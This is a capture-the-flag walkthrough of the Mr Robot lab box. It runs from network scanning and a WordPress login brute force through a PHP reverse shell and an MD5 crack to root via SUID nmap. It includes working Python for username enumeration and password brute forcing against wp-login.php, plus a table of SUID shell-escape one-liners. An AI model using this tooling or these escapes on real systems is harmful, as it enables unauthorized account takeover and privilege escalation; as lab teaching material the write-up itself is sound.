First I find the IP address of the Mr Robot box with arp-scan. The command arp-scan -l lists every host that answers an ARP request on the local segment, and the box turns up at 192.168.201.132.
With the address known, I enumerate the box with nmap. SSH on port 22 is closed while ports 80 and 443 are open, which shows that this box is running a website.
Here I have opened the website served by the box.
I tried a few different approaches on the site itself to find a hint, but found nothing.
robots.txt hidden file
After several attempts I remembered that the first thing to check on a web-based CTF is the robots.txt file: it tells crawlers what not to index, so it often lists exactly the paths the author wants to keep out of sight.
This gives me the first flag I was looking for.
robots.txt also lists a file named fsocity.dic, a dictionary file, which is a sign that a brute-force step is coming.
The dictionary file holds about 80,000 words. It is heavily repetitive, so deduplicating it (sort -u) before use cuts the number of login attempts considerably without losing any candidates.
Earlier I had already run gobuster for directory enumeration and found the WordPress paths, so I know I am dealing with the WordPress CMS.
Since the dictionary had to be meant for this, I brute forced the WordPress login page with it. The screenshot shows a 40-minute run, but before that it had taken me four hours to get a valid username and password. A useful shortcut: wp-login.php answers an unknown username differently from a wrong password for an existing one, so the username can be confirmed first and the wordlist then run against that single account only.
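The following is an added example for this walkthrough, not the author's tooling or part of the original post. It shows the two things the brute-force step depends on: deduplicating a repetitive wordlist like fsocity.dic, and telling the three wp-login.php outcomes apart (unknown username, wrong password, successful 302 to wp-admin) so that the username is confirmed before any password is tried. The error strings are WordPress's default wording (older and newer releases); the credentials, the fake target and the mini wordlist are constructed so the demo runs offline, and http_poster is an assumed helper for pointing the same logic at a live target.

```python
"""WordPress login helpers: deduplicate the wordlist, tell the three wp-login.php
outcomes apart, enumerate a valid username, then brute force only that user."""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional, Tuple

Response = Tuple[int, str]               # (HTTP status, response body)
Poster = Callable[[str, str], Response]  # post(username, password) -> Response

# Default wp-login.php error wording (older and newer WordPress releases).
UNKNOWN_USER_MARKERS = ("Invalid username", "Unknown username")
WRONG_PASSWORD_MARKER = "The password you entered for the username"


def dedupe_wordlist(lines: Iterable[str]) -> List[str]:
    """Strip whitespace, drop blanks and repeats, keep first-seen order."""
    seen = set()
    words = []
    for line in lines:
        word = line.strip()
        if word and word not in seen:
            seen.add(word)
            words.append(word)
    return words


def classify(resp: Response) -> str:
    """Map a login response to success / unknown_user / wrong_password / other."""
    status, body = resp
    if status == 302:  # a successful login redirects to wp-admin
        return "success"
    if any(marker in body for marker in UNKNOWN_USER_MARKERS):
        return "unknown_user"
    if WRONG_PASSWORD_MARKER in body:
        return "wrong_password"
    return "other"


def enumerate_users(candidates: Iterable[str], post: Poster) -> List[str]:
    """Usernames the target admits exist: a wrong-password reply to a dummy password."""
    return [u for u in candidates
            if classify(post(u, "not-the-password")) == "wrong_password"]


def brute_force(user: str, passwords: Iterable[str], post: Poster) -> Optional[str]:
    """Try each password for one user; stop early if the user does not exist."""
    for password in passwords:
        outcome = classify(post(user, password))
        if outcome == "success":
            return password
        if outcome == "unknown_user":
            return None
    return None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep the 302 visible instead of following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_poster(login_url: str) -> Poster:
    """Poster for a live target; field names are WordPress's own (log, pwd, wp-submit)."""
    opener = urllib.request.build_opener(_NoRedirect)

    def post(username: str, password: str) -> Response:
        data = urllib.parse.urlencode(
            {"log": username, "pwd": password, "wp-submit": "Log In"}).encode()
        try:
            with opener.open(login_url, data=data, timeout=10) as r:
                return r.getcode(), r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # the 302 surfaces here because of _NoRedirect
            return err.code, err.read().decode("utf-8", "replace")
    return post


# Constructed stand-in for wp-login.php so the demo runs offline (made-up credentials).
_FAKE_USERS: Dict[str, str] = {"admin": "correct-horse"}


def fake_post(username: str, password: str) -> Response:
    if username not in _FAKE_USERS:
        return 200, '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
    if _FAKE_USERS[username] != password:
        return 200, ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
                     f'for the username <strong>{username}</strong> is incorrect.</div>')
    return 302, ""


def demo() -> Tuple[List[str], Optional[str]]:
    """Constructed mini wordlist with the kind of repetition fsocity.dic shows."""
    words = dedupe_wordlist(["root", "admin", "root", "", "correct-horse", "admin", "letmein"])
    users = enumerate_users(words, fake_post)
    found = brute_force(users[0], words, fake_post) if users else None
    return users, found


if __name__ == "__main__":
    print(demo())
```

Against a real box you would replace fake_post with http_poster("http://192.168.201.132/wp-login.php") and pass the deduplicated fsocity.dic to enumerate_users, then to brute_force for whichever username comes back.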
With the username and password I logged in to the dashboard and looked through the content, but there was nothing of interest there.
The exploit is to insert a PHP reverse shell into the theme's 404 template through the dashboard's theme editor. I use the shell from https://github.com/pentestmonkey/php-reverse-shell, with its IP and port set to my listener, and then request a page that does not exist so the 404 template runs.
Then I start netcat listening on port 1234 (the port the shell is configured with by default) to catch the connection.
The shell I get back is a low-privileged one; I am still not the root user.
In the robot home directory I found the second flag, but it is not readable by my current user. Next to it, however, is a file holding a password stored as an MD5 hash.
I used an online lookup tool to crack the hash. MD5 is fast and unsalted, so a precomputed lookup or an offline dictionary attack (john, hashcat) recovers a weak password in seconds.
If you have a non-TTY shell, there are certain commands you simply cannot run. This is the normal situation after uploading a reverse shell to a web server: the shell runs as the web server's account (www-data or similar), and such accounts are not meant to have interactive shells because they do not interact with the system the way a human user does.
Without a TTY you cannot run su or sudo, which is annoying when you have a password but cannot use it. Since my shell is a non-TTY one, I upgrade it with python -c 'import pty; pty.spawn("/bin/sh")'. (The cheat-sheet alternative echo os.system('/bin/bash') is often listed alongside it, but pty.spawn is the one that actually allocates the pseudo-terminal su needs.)
With a proper TTY I can now use su with the cracked password. The password belongs to the robot account, not root, so that is the user I switch to, and it succeeds.
Now I need the third and last key. My earlier attempt to enter /root was denied, so I checked for programs with the SUID bit set (find / -perm -4000 -type f 2>/dev/null) and saw that nmap is SUID root.
Administrators sometimes set the SUID bit on nmap so that unprivileged users can run the scan types that need raw sockets (SYN scans, OS detection and the like), since those do not work without root privilege.
However, nmap versions 2.02 through 5.21 have an interactive mode (nmap --interactive) from which you can escape to a shell. When the binary is SUID root, that shell runs with root privilege.
So I run nmap --interactive and enter !sh at the nmap> prompt to escape to a shell; id or whoami confirms that it is root.
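As an added example for this privilege-escalation step (not commands from the original walkthrough), the following Python does what the find one-liner does and then matches each SUID binary against a small, hand-picked table of well-known interactive escapes such as the nmap one used here. The escape table is an illustrative assumption, not a complete list, and demo_on_fixture builds a constructed throwaway directory so the check can be exercised without a real SUID nmap.

```python
"""Find SUID binaries and flag the ones with a well-known shell escape."""
import os
import stat
import tempfile
from typing import Dict, List, Tuple

# Hand-picked subset of known SUID shell escapes (illustrative, not exhaustive).
KNOWN_ESCAPES: Dict[str, str] = {
    "nmap": "nmap --interactive, then !sh at the nmap> prompt (nmap 2.02 to 5.21 only)",
    "find": "find . -exec /bin/sh -p \\; -quit",
    "vim": "vim -c ':!/bin/sh'",
    "bash": "bash -p",
    "python": "python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
}


def find_suid(root: str = "/", only_root_owned: bool = True) -> List[str]:
    """Return regular files under root with the SUID bit set.

    Equivalent to: find / -perm -4000 -type f 2>/dev/null
    Symlinks are not followed and unreadable paths are skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            if only_root_owned and st.st_uid != 0:
                continue
            hits.append(path)
    return sorted(hits)


def candidate_escapes(paths: List[str]) -> Dict[str, str]:
    """Match SUID binaries against the escape table by base name (version suffix stripped)."""
    found = {}
    for path in paths:
        base = os.path.basename(path).rstrip("0123456789.")  # e.g. python3.8 -> python
        if base in KNOWN_ESCAPES:
            found[path] = KNOWN_ESCAPES[base]
    return found


def demo_on_fixture() -> Tuple[List[str], Dict[str, str]]:
    """Constructed fixture: one SUID 'nmap' and one plain 'ls' in a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        suid_path = os.path.join(tmp, "nmap")
        plain_path = os.path.join(tmp, "ls")
        for p in (suid_path, plain_path):
            open(p, "w").close()
        os.chmod(suid_path, 0o4755)   # setuid bit on, as on the Mr Robot box
        os.chmod(plain_path, 0o755)
        hits = find_suid(tmp, only_root_owned=False)  # fixture files are not root-owned
        escapes = {os.path.basename(p): how for p, how in candidate_escapes(hits).items()}
        return [os.path.basename(h) for h in hits], escapes


if __name__ == "__main__":
    suid = find_suid("/")
    for path in suid:
        print(path)
    for path, how in candidate_escapes(suid).items():
        print(f"[!] {path}: {how}")
```

Run as a script it walks the whole filesystem as the current user and prints every root-owned SUID file, marking the ones with a known escape; on the Mr Robot box the nmap entry is the one that matters.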
Then I go into /root, where access was denied before because I was not root. Now that I am root it works, and the third flag is there.
I have found the third flag in the root directory, which completes the task for this box.
The following is the list of the three flags I got from this CTF box.